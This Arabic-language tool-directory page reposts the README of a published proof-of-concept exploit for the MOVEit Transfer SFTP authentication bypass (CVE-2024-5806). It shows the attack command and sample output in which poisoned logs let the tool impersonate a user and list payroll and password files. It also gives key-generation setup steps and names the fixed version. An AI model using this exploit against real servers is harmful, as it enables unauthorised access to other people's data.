Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
watchTowr-vs-progress-moveit_CVE-2024-5806 — استغلال لثغرة CVE-2024-5806 | Kitploit
أدوات/GitHubGitHub/watchtowrlabs/watchtowr-vs-progress-moveit_cve-2024-5806
المصادقة والترخيصتحليل الثغرات الأمنيةالاستغلالجمع المعلوماتأمن الويباختبار الاختراق
GitHubwatchtowrlabs/watchtowr-vs-progress-moveit_cve-2024-5806

watchTowr-vs-progress-moveit_CVE-2024-5806

استغلال لثغرة CVE-2024-5806

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
454منذ 2 سنواتتمت المراجعة من قبل Kitploit

CVE-2024-5806

استغلال لثغرة Progress MOVEit Transfer CVE-2024-5806. انظر منشور مدونتنا على [TBD].

إثبات المفهوم في العمل

انظر --help للحصول على، حسنًا، المساعدة. يجب أن يبدو التشغيل النموذجي كما يلي:

root@kitploit:~
> python CVE-2024-5806.py --target-ip 192.168.1.1 --target-user user2 --ppk id.ppk --pem id
                         __         ___  ___________
         __  _  ______ _/  |__ ____ |  |_\__    ____\____  _  ________
         \ \/ \/ \__  \    ___/ ___\|  |  \|    | /  _ \ \/ \/ \_  __ \
          \     / / __ \|  | \  \___|   Y  |    |(  <_> \     / |  | \/
           \/\_/ (____  |__|  \___  |___|__|__  | \__  / \/\_/  |__|
                                  \/          \/     \/

        CVE-2024-5806.py
        (*) Progress MoveIT Transfer SFTP Authentication Bypass (CVE-2024-5806)
          - Aliz Hammond, watchTowr ([email protected])
          - Sina Kheirkhah (@SinSinology), watchTowr ([email protected])
        Note: We (watchTowr) aren't the original discoverers of the bug, we just reproduced it and wrote the exploit
              in order to enable proactive protection of client attack surfaces.
              We will update with proper credit when available.
        CVEs: [CVE-2024-5806]

(*) Poisoning log files multiple times to be sure...
..........OK
(*) Waiting 60 seconds for logs to be flushed to disk
(*) Attempting to authenticate..
(*) Trying to impersonate user2 using the server-side file path 'C:\MOVEitTransfer\Logs\DMZ_WEB.log'
(+) Authentication succeeded.
(+) Listing files in home directory of user user2:

-rw-rw-rw- 1 0 0 1.4M Jun 11 11:39 stocks.xlsx
-rw-rw-rw- 1 0 0 2.4M Jun 13 13:32 customer_list.xlsx
-rw-rw-rw- 1 0 0 2.3M Jun 15 12:16 payroll_Jun.csv
-rw-rw-rw- 1 0 0 1.2M Jan 21 10:03 my_signature.png
-rw-rw-rw- 1 0 0  304 Jun 17 17:29 passwords.txt

الإعداد

لتشغيل الاستغلال، ستحتاج إلى زوج مفاتيح بصيغتي PEM وPPK. على ويندوز، يمكنك استخدام puttygen لإنشاء هذه الملفات. على لينكس، يمكنك استخدام حزمة openssh وputty-tools. فقط اضغط Enter عندما يُطلب منك مفتاحًا.

root@kitploit:~
$ sudo apt-get install openssh-client putty-tools
$ puttygen -t rsa -b 2048 -o putty_key.ppk
Enter passphrase to save key:
Re-enter passphrase to verify:
$ puttygen putty_key.ppk -O private-openssh -o id_rsa

الإصدارات المتأثرة

تم إصلاح هذه الثغرة في إصدار Progress MOVEit 2024.0.2.

مؤلفو الاستغلال

تمت كتابة هذا الاستغلال بواسطة Aliz (@AlizTheHax0r) وSina Kheirkhah (@SinSinology) من watchTowr (@watchtowrcyber)

تابع مختبرات watchTowr

للاطلاع على أحدث الأبحاث الأمنية، تابع فريق مختبرات watchTowr

  • https://labs.watchtowr.com/
  • https://twitter.com/watchtowrcyber
  • [رابط المدونة TBD]
تنزيل الأداة